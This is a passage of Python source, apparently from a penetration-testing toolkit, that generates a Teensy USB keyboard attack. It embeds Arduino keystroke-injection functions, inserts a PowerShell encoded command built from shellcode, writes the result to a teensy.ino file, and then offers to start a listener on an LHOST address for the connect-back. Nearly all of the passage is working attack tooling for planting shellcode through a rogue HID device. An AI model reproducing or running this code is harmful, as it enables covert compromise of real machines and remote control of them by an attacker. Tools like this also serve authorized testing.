} void PRES(int KeyCode){ Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void SPRE(int KeyCode){ Keyboard.set_modifier(MODIFIERKEY_SHIFT); Keyboard.set_key1(KeyCode); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } """ % (core.powershell_encodedcommand(shellcode))) print("[*] Payload has been extracted. Files can be found under /root/.set/reports/teensy.ino") if not os.path.isdir(os.path.join(core.userconfigpath, "reports")): os.makedirs(os.path.join(core.userconfigpath, "reports")) with open(os.path.join(core.userconfigpath, "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ")